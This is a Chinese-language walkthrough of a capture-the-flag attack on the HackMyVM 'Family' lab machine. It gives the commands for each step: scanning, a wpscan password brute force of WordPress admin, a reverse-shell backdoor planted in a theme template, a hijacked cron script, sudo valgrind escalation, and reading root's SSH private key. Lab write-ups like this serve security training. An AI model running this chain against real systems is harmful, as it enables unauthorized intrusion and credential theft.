靶場學習 | 記一次對Family靶機的滲透測試
靶機信息
靶機地址:https://hackmyvm.eu/machines/machine.php?vm=Family
名稱:(家庭)
難度:中等
創作者:cromiphi
發布日期:2021-04-30
目標:user.txt和falg.txt,root權限
搭建靶機
下載完Family.ova后,使用Oracle VM VirtualBox導入即可
導入時注意!!不要勾上USB控制器,不然會出錯
導入完成后,直接啟動即可,就可以開始靶機之旅
實驗環境
攻擊機:VMware Kali 192.168.31.185 目標機:VirtualBox Debian IP自動獲取
信息收集
掃描局域網內的靶機IP地址
nmap -sn 192.168.31.0/24
端口掃描,掃描目標機器所開放的服務
nmap -A -p- 192.168.31.214
掃描到22(SSH)、80(HTTP)兩個端口,使用火狐瀏覽器訪問80端口,http://192.168.2.214
是個wordpress,繼續訪問http://192.168.31.214/wordpress/,右擊查看源碼
本機加個family的hosts再繼續訪問
目錄掃描,掃描一些敏感文件之類的,使用gobuster來掃描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150
滲透測試
使用 wpscan 掃描 wordpress,沒有發現可用的
wpscan --url http://family/wordpress/
使用 wpscan來爆破用戶名
wpscan --url http://family/wordpress/ --enumerate u
發現一個admin
使用 wpscan來爆破admin用戶的密碼
wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin
訪問http://family/wordpress/wp-login.php,輸入賬號密碼,登錄后臺
通過修改模板寫入后門,訪問文件即可獲取反彈shell
訪問404頁面http://family/wordpress/wp-content/themes/twentytwentyone/404.php
新開一個終端頁面開啟監聽
nc -lvnp 6666
檢查home,發現有3個用戶
繼續尋找一些有用的資源,發現了father用戶的密碼
新開一個終端頁面來登錄father用戶
ssh father@192.168.31.214 id cd /home ls -al
發現/home/mother 屬于組father
上傳pspy64來查看進程
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 chmod +x pspy64 ./pspy64
發現/bin/sh -c python ~/check.py每一分鐘就執行一次
這樣就可以在 /home/mother/check.py 中編寫一些反向shell代碼,等一分鐘后就可以得到mother用戶的反向shell
新開一個終端頁面開啟監聽
nc -lvnp 5555
檢查用戶mother用戶的權限,發現可以以用戶baby運行二進制valgrind
sudo -l
執行以下命令,得到baby用戶的shell
sudo -u baby valgrind /bin/bash /bin/bash -i
拿到user.txt的flag
再次檢查baby用戶的權限
sudo -l
查看root的ssh密鑰
sudo cat /root/.ssh/id_rsa
將ssh密鑰保存下來,通過ssh密鑰來提權
新開一個終端頁面來登錄root
chmod 600 id_rsa ssh -i id_rsa root@192.168.31.214
發現一登錄就會退出,因為 /root/.ssh/authorized_keys 執行 /root/troll.sh,它就會立即退出
現在要使shell代碼不退出,需要將終端尺寸變小,使“more”無法顯示全部信息再通過!/bin/bash來轉義
ssh -i id_rsa root@192.168.31.214 !/bin/bash
成功獲取到root權限,拿到flag
聲明:請勿用作違法用途,請在授權情況下使用
